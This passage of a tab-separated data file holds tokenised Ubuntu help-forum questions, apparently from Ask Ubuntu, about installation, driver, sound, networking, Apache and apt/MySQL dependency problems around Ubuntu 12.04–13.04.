-a linux geant4 3.0.0-32-generic-pae # 51-ubuntu smp thu mar 21 16:09:48 utc 2013 i686 i686 i386 gnu/linux please help me .
309198	detaching from screen inside a byobu session	for quite some time i 've been using screen to detach and let them run in the background . then i discovered byobu to have mutliple tabbed shells running . now i have a problem that i 'm no longer able to detach from a screen inside my byobu shells , since ctrl-a-d detaches the byobu session and not the screen session inside it . i read a few times that ctrl-a is supposed to work , which would make this ctrl-a-a-d , but this simply switches tabs ( ctrl-a-a ) and then quits the shell ( ctrl-d ) . is there a simple solution to be able to detach again ?
309199	how to block outgoing emails from gmail in ubuntu 12.04	friends , i am an ubuntu 12.04 user and i want to any user ca n't send email from gmail in my pc , because they sending abuse mails from their gmail account but sending from my pc . so , please help me and suggest the right way .
309201	writing numbered headings in writer	in libreoffice writer , i am trying to make all my numbered headings in the following form : 1 . first title 1.1 subtitle 1.2 subtitle 2 . second title 2.1 subtitle 2.2 subtitle 2.2.1 subsubtitle i tried playing around with tools > outline numbering , but the best i can only get one of the following : 1 . first title 1.1 subtitle 1.2 subtitle 2 . second title 1.3 subtitle 1.4 subtitle or 1 . first title 1.1 subtitle 1.2 subtitle 2 . second title 1.2 subtitle 1.3 subtitle is there any way for me to put the subheading 's numbering as a function of the numbering of the heading above , like in the example on the top ? i am running a .docx file in libreoffice 4.0.3.3 . edit : i edited this question as per suggestions in the comments . problem solved : it seems like the big problem was the following . all the headings in the original file had a correct format ( i.e . heading 1 , heading 2 , etc ) . however , they had not been correctly converted to the `` corresponding '' heading 1 , heading 2 , etc that libreoffice uses ( thanks @ gertvdijk ) . thus , followin the steps in the accepted answer gets the job done . thanks !
309202	how often is the password asked for sudo commands ? where can i set it up ?	i execute quite a lot of sudo commands . i noticed that if i execute one and then another one within few minutes , the 2nd time i do n't get the message : [ sudo ] password for my_username : but i do get it when there is more time between the execution of the two commands . what 's the period of time in which the message is not appearing ? how can we check it / update it ?
309209	ubuntu update manager fails to install upates ( version 12.04 lts )	i am known about ubuntu for quite a while but only a couple of months ago i started using it more often as my secondary os . anyway , my problem is that the update manager keeps failing to install the 16 updates i have and i 'm not sure why so i need some help from more experienced users . i have a lenovo g575 laptop with an amd e300 apu 1.3ghz and 4gb ram . below is the message i get when the update has failed . installarchives ( ) failed : preconfiguring packages ... preconfiguring packages ... preconfiguring packages ... preconfiguring packages ... ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % dpkg : unrecoverable fatal error , aborting : reading files list for package 'libbonoboui2-0 ' : input/output error error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 2 )
309213	how to set my internet connection 's default to hsdpa ?	i 'm using a 3g wireless dongle to connect to the internet . on windows there 's a software for this dongle but on ubuntu i can use it without any software 's . but the thing is that this connection can automatically toggle between gsm and hsdpa modes . when this happens my connection speed goes very low . on windows i can manually set this to just work with hsdpa . now i need to know how to set this up on ubuntu and make the connection just work with hsdpa .
309214	impossible to turn inspirion 1545 into access point ?	my wireless card worked out of the box , but now i want to turn the maschine into an access point so i followed these guides setting up a wifi adapter to support `` master mode '' how to setup a wi-fi hotspot ( access point mode ) ? unfortunately , iwconfig eth1 mode master returns error for wireless request `` set mode '' ( 8b06 ) : set failed on device eth1 ; invalid argument . and according to iw list supported interface modes are ibss and managed . strangely using windows ' hosted network works fine . my network controller is broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) .
309216	firefox disappears after reboot	i set my uncle up with ubuntu while i was doing some work on his website in france and he 's recently emailed me with a troubling issue . it appears that , when he reboots his computer , firefox disappears from the side-bar and , despite being in the unity menu system , he is unable to launch it from there either - until he un-installs and re-installs firefox .
309222	13.04 does n't seem to install grub correctly . 12.04 works perfectly	i 've tried several attempts at installing 13.04 on a machine . once , it worked correctly , but i 've never been able to get it to work again . i 've tried kubuntu , stock ubuntu , and even mint . they all seem to act the same way . after it installs and tells me to remove the media and hit enter , it gets to the bios screen and the bios says to insert media . i 've confirmed that it 's attempting to boot from the correct drive ( the one i told the install to use ) . if i can be of any help , please let me know . i 'm very keen on using kubuntu-desktop .
309228	apache service not starting	while trying to install apache version 2.4.4 using the following method : source : http : //zhuojun.info/ ? p=1121 before installing apache 2.4.4 , you should install pcre , otherwise it will not succeed . the process of installing pcre is simple . after you downloaded it , run in terminal next commands : sudo ./configure sudo make sudo make install download apr and apr-util from http : //apr.apache.org , unpack them to apache directory , /srclib/apr and /srclib/apr-util ( no version numbers in the directory names ) and type following commands to install apache : sudo ./configure -- with-included-apr sudo make sudo make install type following command to start apache : sudo /usr/local/apache2/bin/apachectl start there may be something wrongs like : /usr/local/apache2/bin/httpd : error while loading shared libraries : libpcre.so.1 : can not open shared object file : no such file or directory type following command to see httpdâs shared library dependencies : ldd httpd found `` libpcre.so.1 = > not found '' , then type the following command to update links : sudo ldconfig restart apache and should work . everything seemed fine but when i tried to start the apache service it gives error : root @ server1 : /usr/local/apache2/bin # /etc/init.d/apache2 start * starting web server apache2 /usr/sbin/apache2 : symbol lookup error : /usr/sbin/apache2 : undefined symbol : apr_ldap_url_parse action 'start ' failed . the apache error log may have more information . [ fail ] i tried to install the apr again but nothing seems to work . please help . the apache log shows something like this : [ mon jun 17 10:31:08 2013 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.3.10-1ubuntu3.6 with suhosin-patch configured -- resuming normal operations [ mon jun 17 11:48:20 2013 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.3.10-1ubuntu3.6 with suhosin-patch configured -- resuming normal operations [ mon jun 17 15:44:36 2013 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.3.10-1ubuntu3.6 with suhosin-patch configured -- resuming normal operations
309234	how to get tascam us-122l sound card to work ?	i 've just started using ubuntu 13.04 , but i ca n't seem to get my sound card ( tascam us-122l ) up and running . i'vce tried many tutorials , but none satisfying . strangely , at some point , i got the computer to detect my sound card , as it got listed . but a minute later , it was gone ( also even then i could n't get it to play music ) is there a way of installing the hardware ? i also tried to install the windows driver using wine , but that gave an error ... lsusb output : bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 13d3:5130 imc networks bus 002 device 007 : id 0644:800e teac corp. tascam us-122l bus 002 device 006 : id 046d : c058 logitech , inc. m115 mouse i seem to get some response , but no sound ... result from aplay -l : default playback/recording through the pulseaudio sound server sysdefault : card=mid hda intel mid , conexant analog default audio device front : card=mid , dev=0 hda intel mid , conexant analog front speakers surround40 : card=mid , dev=0 hda intel mid , conexant analog 4.0 surround output to front and rear speakers surround41 : card=mid , dev=0 hda intel mid , conexant analog 4.1 surround output to front , rear and subwoofer speakers surround50 : card=mid , dev=0 hda intel mid , conexant analog 5.0 surround output to front , center and rear speakers surround51 : card=mid , dev=0 hda intel mid , conexant analog 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=mid , dev=0 hda intel mid , conexant analog 7.1 surround output to front , center , side , rear and woofer speakers dmix : card=mid , dev=0 hda intel mid , conexant analog direct sample mixing device dsnoop : card=mid , dev=0 hda intel mid , conexant analog direct sample snooping device hw : card=mid , dev=0 hda intel mid , conexant analog direct hardware device without any conversions plughw : card=mid , dev=0 hda intel mid , conexant analog hardware device with all software conversions usb_stream : card=mid hda intel mid usb_stream : card=us122l tascam us-122l hdmi : card=generic , dev=0 hd-audio generic , hdmi 0 hdmi audio output dmix : card=generic , dev=3 hd-audio generic , hdmi 0 direct sample mixing device dsnoop : card=generic , dev=3 hd-audio generic , hdmi 0 direct sample snooping device hw : card=generic , dev=3 hd-audio generic , hdmi 0 direct hardware device without any conversions plughw : card=generic , dev=3 hd-audio generic , hdmi 0 hardware device with all software conversions usb_stream : card=generic hd-audio generic lastly cat /proc/asound/cards : 0 [ mid ] : hda-intel - hda intel mid hda intel mid at 0xd5200000 irq 48 1 [ us122l ] : usb us-122l - tascam us-122l tascam us-122l ( 644:800e if 0 at 002/007 ) 2 [ generic ] : hda-intel - hd-audio generic hd-audio generic at 0xd0040000 i 've still have n't found the correct solution , sometimes it recognises my tascam , but often not , i ca n't seem to find the reason why sometimes it does and when it does n't . now if he recognises it , i still ca n't get it to play any sound . i get the above mentioned responses from cat /proc/asound/cards , but when trying pavucontrol , no tascam to be found ... so i guess my question expands more then i thought : how do i get my computer to recognise the card each time if the card is recognised , how do i tell the computer to use the card for audio applications.. when following the advice of using next command : speaker-test -d usb_stream : card=us122l i get : speaker-test 1.0.25 playback device is usb_stream : card=us122l stream parameters are 48000hz , s16_le , 1 channels using 16 octaves of pink noise access type not available for playback : ongeldig argument setting of hwparams failed : ongeldig argument ( ongeldig argument is dutch for invalid argument ) so far i 've tried : http : //wiki.briata.org/doku.php ? id=testing_us122l_under_linux the links referred in that document
309236	problem writing 'pipe ' symbol on danish keyboard ( ubuntu 12.04 server , console )	i just installed ubuntu 12.04 server ( 32-bit ) on an old machine , and have problems writing the | ( pipe ) symbol . i have no graphical ui installed . my keyboard has danish layout , and all other symbols than | , that i have needed , work perfectly . if i change to e.g . us layout , i can write | , but of course through a combination that makes little sense on my keyboard , and makes be unable to write special danish symbols that i need . in /usr/share/x11/xkb/symbols/dk , under section xkb_symbols `` basic '' there is the line key < ae12 > { [ dead_acute , dead_grave , bar , brokenbar ] } ; which , as i see it , points to the correct key ( 5th row from bottom , 13th key from left , just to the left of backspace ) . also the acute and grave keys works . i also tried changing to 'eliminate dead keys ' ( which has a similar line ) to no avail . it 's not that altgr is broken either , since it works well on other key combinations . any suggestions as to what may be wrong ?
309238	how do i change my operating system from windows to ubuntu ?	i would like to change my os from windows 7 ultimate ( 32 bit ) to ubuntu can i change it ? and what is the procedure ? where can i download or get ubuntu software ( web site ) and how do i decide which version suits my pc ? can all the software which work in windows still work on ubuntu ?
309239	nvidia driver install	i tried blacklisting and everything i could find on the internet used with root and alt+ctrl+f1 with no solution : nvidia-installer log file '/var/log/nvidia-installer.log' creation time : mon jun 17 08:35:25 2013 installer version : 319.23 path : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin nvidia-installer command line : ./nvidia-installer using : nvidia-installer ncurses user interface - > license accepted . - > installing nvidia driver version 319.23 . - > running distribution scripts executing : '/usr/lib/nvidia/pre-install ' ... - > done . - > the distribution-provided pre-install script failed ! continue installation anyway ? ( answer : yes ) error : the nouveau kernel driver is currently in use by your system . this driver is incompatible with the nvidia driver , and must be disabled before proceeding . please consult the nvidia driver readme and your linux distribution 's documentation for details on how to correctly disable the nouveau kernel driver . warning : one or more modprobe configuration files to disable nouveau are already present at : /etc/modprobe.d/nvidia-installer-disable-nouveau.conf . please be sure you have rebooted your system since these files were written . if you have rebooted , then nouveau may be enabled for other reasons , such as being included in the system initial ramdisk or in your x configuration file . please consult the nvidia driver readme and your linux distribution 's documentation for details on how to correctly disable the nouveau kernel driver . error : installation has failed . please see the file '/var/log/nvidia-installer.log ' for details . you may find suggestions on fixing installation problems in the readme available on the linux driver download page at www.nvidia.com .
309247	offline programs like mozilla seamonkey for ubuntu	does anybody know of a program i can use offline in ubuntu to help develop web pages , something like mozilla sea monkey , but not requiring a internet connection as my internet is slow and un-reliable as it is teatherd from a phone . any suggestions are welcome thanks .
309253	ubuntu touch manual installation	i want to install ubuntu touch on my google nexus 4 . i want manual installation to be done . please let me know which files should i download from the following url given : http : //cdimage.ubuntu.com/ubuntu-touch-preview/daily-preinstalled/current/
309258	what are the proper gimp settings for a color calibrated display ?	i 've been doing photo management for years and thought i had this all worked out , but something changed recently such that i question whether i actually know what color management settings i should be using . i use the gimp for my photo editing . in the past , when i changed the `` rgb profile '' in gimp 's settings , i would see a distinct difference between the adobergb setting and the srgb setting ( and i would use this to set the colors differently depending on the destination file ) . lately , i see no difference at all , however the saved png files are flat and unsaturated compared to what gimp shows me . i 'm running ubuntu 13.04 . i have color calibrated my monitor and set the profile in the system settings . i have set gimp preferences to ... '' color managed display '' rgb profile : adobergb 1998 , srgb ( does not matter which , everything looks the same now ) cmyk profile : none monitor profile : none try to use system monitor profile : off i noticed that if i set an adobergb 1998 monitor profile , the colors i see in gimp match the colors i see in the screen . so , given that i am sometimes taking my photos to print ( at a professional color-calibrated shop ) what are the correct settings in the gimp ? should my monitor profile be set to `` adobe rgb 1998 '' ? how does this interact with the color calibration system setting ? update : i found the answer to the question on photos.stackexchange.com . i propose this be closed as a duplicate .
309259	windows xp does n't start up dual boot ubuntu 12.04 lts	i have installed windows xp first and then ubuntu 12.04 lts . i have 2 or 3 times upgraded ubuntu with newer versions . both were working fine . no problem a few weeks ago i upgraded ubuntu again and i believe after the upgrade i ca n't start windows xp via grub . the option `` start windows xp '' is in the grub overview and now when i select windows xp at the grub screen , it goes black and stays black . `` it hangs '' . windows is still there because i have tried with the windows xp install disc and choose the 'r'epair choice . then i get the question which windows version do you want to connect to or somenthing like that . then you have to fill the admin password . any ideas on how to fix this ? i have tried several things : how to fully fix the windows bootloader using a windows disk this was i think not a good choice because the complete did n't came anymore . so i could not start windows and ubuntu anymore installed ubuntu newer version 13.xx again , i hope that then grub would recover boot-repair : https : //help.ubuntu.com/community/boot-repair i have tried boot-repair by terminal mode . i get the result that is was succeeded maybe some more things but i ca n't recover all my trials . ************ edit ************ i 'm a little bit further . i have done again step 1 , exept fixmbr . if i choose now windows then i get the boot.ini startup menu what is written in the . i have added the safe mode to the boot.ini . when i choose this then it hangs with loading bootvld.dll ( i believe that was the name . i ca n't check it at the moment. ) . if check the normal startup then the screen is turned into black and the computer `` hangs '' . i have copied the two files ntldr and ntdetect.com from the i386 dir . to the root . i have done this with ubuntu . what i was asking myself is , boot.ini : [ default ] multi ( 0 ) ... . partition ( 1 ) = '' windows xp '' [ ... . ] multi ( 0 ) ... . partition ( 1 ) = '' windows xp '' /fastdetect multi ( 0 ) ... . partition ( 1 ) = '' windows xp safe mode '' with some switches is this right ? how do i know that windows is on partition 1 ? is there a tool ? and i 've been searching for a example of a boot.ini file with dual boot .
309260	data recovery from a microsd in ubuntu	i have a microsd card that was in a camera that got hit by a rally car ... i 'd like to recover the videos that are on the card , but i 'm not having much luck . i 've tried mount it using an external card reader . trying to find the /dev/ point with ls -la /dev/sd* gives sd [ b-e ] as possible options . trying to mount each of those points via mount /dev/sdx /media/sd results in mount : no medium found on /dev/sdx except with /dev/sde . when i try mounting this the command just hangs ( with a blinking pointer ) , and looks like its still trying to process it . i 'm assuming this is the correct /dev/ point . trying fdisk -l has the same effect , it produces information about my primary hard drive okay , but then has the blinking pointer as if it 's waiting for something . gparted just says `` scanning all devices '' . i 'm just wondering if anyone has an suggestions on what i could try next , or is it completely dead ? version is ubuntu 13.04
309267	start application at resume	how do i automatically start an application on resume after suspend or hibernate ? the reason i want to do this is because i 've created a script to set xinput value on startup application , but after suspend or hibernate the value in xinput back to default .
309273	how to hide or remove ubuntu 12.10 from ubuntu unity login screen	how to hide or remove ubuntu 12.10 from ubuntu unity login screen ? how to change or remove ubuntu 12.04 lts text & ubuntu logo from system details ? is there any way to replace ubuntu 12.10 with any logo as follows : ?
309274	32 bit or 64 bit for 13.04	can i change from 64 bit to 32 bit without re-installing 13.04 ? i believe that i installed it as a 64 bit , and am wondering if that is causing all of the problems that i am having since the installation . thank you .
309276	no `` enable broadband '' option in network settings of ubuntu 12.10	i used to use 12.04 lts and had the same problem..upgraded to 12.10 as i have read somewhere that 12.10 has a fix for it ... but i still face the same problem.. *i have wvdial ... usb-mode switch packages *my modem also shows up in lsusb command *i have added my modem under the mobile broadband tab of network settings *enabled networking in recovery mode note : -when i boot up in the recovery mode..the option is available in the network settings to `` enable broadband '' and also my modem shows up and i am able to connect it ... but i am unable to do so in the normal boot . p.s : - i use tata photon +
309278	problem restarting apache2	when trying to restart apache2 , i type : sudo /etc/init.d/apache2 restart response i get : could not reliably determine the server 's fully qualified domain name can anyone tell me what i 'm doing wrong ?
309284	trouble transferring files to ubuntu server from mac	i am trying to setup my first home server and have n't had too much trouble so far . however i ca n't seem to find a way to transfer files from my laptop ( macbook pro ) to the server . i have been able to mount the drive and open the folder in finder . when i go to copy a file i receive a popup window that states `` finder wants to make changes . type your password to allow this . '' i then enter my laptop 's password and receive another message saying `` the operation ca n't be completed because you do n't have permission to acces some of the items . '' i am connected to the server using my registered user account , am running ubuntu server version 12.04.2 , and using webmin . any help with correcting this problem would be greatly appreciated . thank you !
309293	no sound through hdmi cable , nvidia	few days ago i 've decided to install ubuntu 13.04 ( with dual boot windows 8 ) on my old laptop ( toshiba qosmio f55 q502 ) and make it my media center . everything went well except that i do n't have sound through my hdmi cable . i have tried looking for solution in other posts but with no luck . in the sound settings , i see 3 options : speakers , spdif , and hdmi . when i choose hdmi i 'm not getting any sound in my tv . i have updated the nvidia driver ( before that there was no video through hdmi as well ) please help me to solve this issue and to forget windows for good . thank you **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : alc272 analog [ alc272 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 1 : alc272 digital [ alc272 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0
309301	in 13.04 using unity tweak tool hot corners stops working after reboot	i have 13.04 64 bit ubuntu installed and i 'm using unity tweak tool to enable hot corners everything works as it should as long as i do n't reboot as soon as i do hotcorners stops working . in order to get them functioning again i have to open the tweak tool and turn hotcorners off and then back on after every reboot . this i admit is n't a huge issue but is annoying is there anyway to get hotcorners to work properly after reboot with out having to reset them every time ?
309302	ubuntu/qt application	in qt creator : is the 'qt gui application ' completely different from 'ubuntu touch gui application ' ? does ubuntu app developer community accept 'qt gui application ' developed on ubuntu platform ?
309307	epson perfection v600 photo scanner	i installed the driver for this scanner iscan-data_1.13.0-1all.deb as well iscan_2.28.1-3.ltdl7_i386.deb but the scanner does not work . can anybody help me ?
309311	using ext4 partitions on external storage	if i want to use a usb flash memory or an external hard disk to transfer data and at the same time i want to use ext4 partitions on them . how could i do that without getting problems regarding permissions and ownership ? how could i use it as i would if i were using ntfs partitions ; without having to change permissions or ownership every time i plug it in a computer ? note : i understand that i wo n't be able to access these partitions from windows , but i want to be able to access them from any linux machine without having to change permission or ownership . i know that i wo n't face any problems if the other machines 's user id is the same as mine ; but for instance , fedora 's first user has the id 500 and ubuntu 's first user has the id of 1000 , which means that if i was transferring data from an ubuntu machine to a fedora machine , i 'll either have to change permissions or i 'll have to change ownership . which is what i want to avoid .
309314	fresh ubuntu 13.04 install ( from mini.iso ) , no gui	i did a fresh install of ubuntu 13.04 desktop on my machine from the mini.iso to alleviate the hours it would take to download the entire version ( slow internet connection ) . it all installed fine , though i feel like i missed some important packages . i installed kubuntu ( unity is a hassle on my desktop , ca n't handle it ) , and rebooted . it booted straight into terminal ( or whatever it 's called , not a gui ) . i have an old nvidia quadro 560 as my gpu so i assumed it was n't booting the gui because there were n't any drivers installed yet . so i updated all my packages and headers with sudo su apt-get update apt-get install linux-headers-generic apt-get install nvidia-current-updates nvidia-xconfig rebooted , still launched into 'terminal ' , though this time the resolution was off ( origionaly was correct at 1900x1200 , now it 's 800x600 ) . do n't really know what i missed , attempted startx in super user , and it was not recognized . again i feel like i did not install any gui packages , though i do n't know enough about linux to know what command/repository to grab these from . unless i do have it and do n't know how to get it to load . thanks for any help that 's given , new to linux but not a complete novice at it . ( note : i had had ubuntu 12.10 installed on this desktop , attempted to upgrade via upgrade manager and i think it froze during the update causing errors . attempted to fix this with apt-get update and it caused a kernel panic , of which i did not feel like fixing so i went this route with a fresh install ) .
309320	same ip settings for multiple wifi connection	i am using college wifi . there are many access points in the college . each have different name and different mac addresses . college provides static ip address for each user . so i need to set the ip address for every access point i connect . is there any easy way to set a static ip address for all the wifi network i connect ? it was easy with windows because if you set static ip for wifi it applies to all the network you connect .
309325	missing icons in gnome-shell overview	there are applications icons missing in my gnome-shell 3.8.2 overview , but this was n't like that on a fresh install with gnome3-ppa enabled . i do not have or had the gnome3-staging-ppa enabled . i had alacarte installed , as i conveniently wanted to edit the icons showing up in the overview . unfortunately , it messed up and placed all newly installed applications to the `` other '' category , so i purged it . also , i tried the pantheon file manager , just to have a look at the miller columns . purged as well , but maybe there is some configuration file messed up ? at the moment , i have the faience icon theme installed , but setting a different icon theme in tweak tool does not change anything . whenever i install a new application , the icon wo n't shop up in the overview . is there a way to 'clear ' my messed up configuration ? i really do not want to edit every single .desktop-file manually . menulibre is currently installed on my system , but changing the icons manually does not make them show up in the overview .
309327	high cpu on video chats : any options ?	with googling and finetuning , i 've always been happy with ubuntu . but now i ca n't find a solution anywhere for the high cpu usage of video conferencing . i have an asus 1215b eeepc , since more than a year on 12.04 . finally i installed 13.04 but still , the same issues are present . fglrx & pulseaudio are necessary . already pulseaudio has dropped from 30 % cpu to 10 % cpu with fine tuning . when video chat of skype is on , there 's a constant use of 60 % -70 % what heats up the whole thing and makes it crash . today i 've installed the google video chat plugin , and the same thing happens . is the high cpu specific to this hardware and the special tuning needed ? fglrx ? pulsaudio ? ... and is there a solution ? alternative ? ( besides buying another laptop ) what is the best performing video chat with low cpu usage , and windows compatible for the other ( dark ) side that still is ms indoctrinated . now , with only skype and firefox , the laptop overheats constantly , certainly in summer .
309329	no internet connection when try to install ubuntu 12.04	currently windows 7 is running on my pc . when i boot to windows - > connected to the internet . when i try to install ubuntu 12.04 and boot from the installation cd - > `` disconnected - you are now offline '' . there is a lan cable connected directly from my router to my pc . no wlan used . anyone an idea how to fix that very annoying problem ?
309331	firefox import bookmarks/settings dialog	i 've been very unhappy with chrome off late , and i want to move back to firefox . the only problem is i have a load of bookmarks and saved passwords in chrome . i remember firefox showing me a dialog to import bookmarks and passwords from chrome the first time i started it , but i just ca n't seem to find it anywhere now . i even tried googling for it , but no one seems to address the issue . i am sure there is something very simple i am missing here .
309334	install mysql connector	i am attempting to copy mysql.jar.com.mysql.jdbc.driver in the java directory . i get a permissions error . i have administrative privileges so i do n't know what the problem is . my feeling is that ubuntu archive manager should handle it but i ca n't get that to work either . i am attempting to link a libre base application to a mysql host = 216.87.239*.206:3306/accouoj3_isr i do n't know if i should be using a odbc or jdbc with that particular host .
309335	can not install vim with apt-get	sudo apt-get install vim reading package lists ... done building dependency tree reading state information ... done package vim is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'vim ' has no installation candidate i 've tried sudo apt-get update & & sudo apt-get upgrade but no effect , same problem . i 've just installed ubuntu . vim works but a b c d are printed when arrow keys are pressed . # deb cdrom : [ ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130424 ) ] / raring main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //pk.archive.ubuntu.com/ubuntu/ raring main restricted deb-src http : //pk.archive.ubuntu.com/ubuntu/ raring main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //pk.archive.ubuntu.com/ubuntu/ raring-updates main restricted deb-src http : //pk.archive.ubuntu.com/ubuntu/ raring-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //pk.archive.ubuntu.com/ubuntu/ raring universe deb-src http : //pk.archive.ubuntu.com/ubuntu/ raring universe deb http : //pk.archive.ubuntu.com/ubuntu/ raring-updates universe deb-src http : //pk.archive.ubuntu.com/ubuntu/ raring-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //pk.archive.ubuntu.com/ubuntu/ raring multiverse deb-src http : //pk.archive.ubuntu.com/ubuntu/ raring multiverse deb http : //pk.archive.ubuntu.com/ubuntu/ raring-updates multiverse deb-src http : //pk.archive.ubuntu.com/ubuntu/ raring-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //pk.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb-src http : //pk.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu raring-security main restricted deb-src http : //security.ubuntu.com/ubuntu raring-security main restricted deb http : //security.ubuntu.com/ubuntu raring-security universe deb-src http : //security.ubuntu.com/ubuntu raring-security universe deb http : //security.ubuntu.com/ubuntu raring-security multiverse deb-src http : //security.ubuntu.com/ubuntu raring-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu raring partner # deb-src http : //archive.canonical.com/ubuntu raring partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu raring main deb-src http : //extras.ubuntu.com/ubuntu raring main
309339	apt-get wo n't remove or install anything due to mysql	i am attempting to update my system using apt-get and the package manager . when i run update , i get an error about mysql dependencies . as i do not care about mysql i attempt to 'purge ' it - this is what i get : sudo apt-get remove -- purge mysql-server-5.5 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : mysql-server : depends : mysql-server-5.5 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . when i do sudo apt-get -f install it gives the following which seems similar : sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : liblash3 libcommons-jxpath-java libmaven-dependency-tree-java libjaxp1.3-java junit4 libgnustep-base1.20 libplexus-archiver-java libmaven-filtering-java librhino-java extra-xdg-menus libplexus-containers-java libmaven-compiler-plugin-java libwagon-java libappframework-java libmodello-java libgeronimo-jms-1.1-spec-java libunity4 libdb4.7-java libunity6 libmaven-resources-plugin-java libplexus-compiler-javac-java libplexus-classworlds-java libmaven2-core-java libx264-116 libfile-homedir-perl libhttpclient-java libservlet2.4-java antlr libcommons-beanutils-java libxom-java libxalan2-java libcommons-jexl-java zeitgeist-extension-fts libecal1.2-8 g++-4.5 junit libplexus-cipher-java libtextcat-data libdom4j-java libxpp2-java libasm2-java default-jdk-doc libdee-1.0-1 libplexus-component-api-java libplexus-build-api-java libplexus-i18n-java libutouch-geis1 libplexus-interactivity-api-java libqdox-java libncurses5-dev libstdc++6-4.5-dev libnspr4-0d : i386 libsqlite0 libswingx-java libcommons-cli-java java-wrappers libjaxen-java libunity-misc0 libindicator3-6 gir1.2-vte-0.0 gir1.2-appindicator-0.1 libxbean-java libcommons-net2-java libgadu3 libswingworker-java libmaven-clean-plugin-java libsaxon-java libfolks22 jruby1.1 lib32ffi6 libitext1-java libdb5.1-java libcommons-collections-java libgegl-0.0-0 libindicator3 libindicator6 libplexus-ant-factory-java libplexus-container-default-java default-jdk libjsch-java libtinfo-dev bsh libplexus-compiler-manager-java libgdata11 libeasymock-java libplexus-compiler-api-java fop libedata-cal1.2-10 libjaxme-java libedata-book1.2-8 libfm-gtk0 libbsf-java libgwibber1 libnekohtml-java libplexus-io-java libplexus-bsh-factory-java libclassworlds-java libedataserverui1.2-11 eagle-data libplexus-interpolation-java libgoogle-collections-java libplexus-digest-java gcj-4.5-base libgdata1.7-cil libminiupnpc5 libpoppler-glib6 libantlr-java libjdom1-java libhttpcore-java libmaven-file-management-java libtextcat0 libfm0 libservlet2.3-java libmaven-jar-plugin-java libcommons-vfs-java libxpp3-java libjsr305-java libjsoup-java libjpeg62 : i386 libquvi0 libregexp-java lib32ncursesw5 libfop-java libplexus-compiler-java libcommons-configuration-java rhino libnl3 libgtkspell3-0 libboost-serialization1.42.0 libcamel1.2-19 libxmlgraphics-commons-java libwerken.xpath-java gir1.2-dee-0.5 libavahi-compat-libdnssd1 libhamcrest-java libmaven-archiver-java libnetbeans-cvsclient-java libequinox-osgi-java libobjc2 libcommons-collections3-java libplexus-utils-java libplexus-sec-dispatcher-java libmaven-scm-java libdoxia-java libfolks-telepathy22 libcommons-digester-java libbatik-java libbackport-util-concurrent-java libmaven-install-plugin-java libmaven-shared-io-java libnatpmp1 python-wsgi-intercept libjline-java libcommons-io-java libpoppler13 libnss3-1d : i386 icc-profiles-free liboverlay-scrollbar-0.1-0 libebook1.2-10 libllvm2.9 libllvm2.9 : i386 libganymed-ssh2-java use 'apt-get autoremove ' to remove them . the following extra packages will be installed : mysql-server mysql-server-5.5 suggested packages : tinyca the following packages will be upgraded : mysql-server mysql-server-5.5 2 upgraded , 0 newly installed , 0 to remove and 191 not upgraded . 2 not fully installed or removed . need to get 0 b/8,867 kb of archives . after this operation , 57.3 kb of additional disk space will be used . do you want to continue [ y/n ] ? dpkg : dependency problems prevent configuration of mysql-server-5.5 : mysql-server-5.5 depends on mysql-server-core-5.5 ( = 5.5.29-0ubuntu0.12.04.2 ) ; however : version of mysql-server-core-5.5 on system is 5.5.31-0ubuntu0.12.04.2 . dpkg : error processing mysql-server-5.5 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already no apport report written because maxreports is reached already errors were encountered while processing : mysql-server-5.5 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 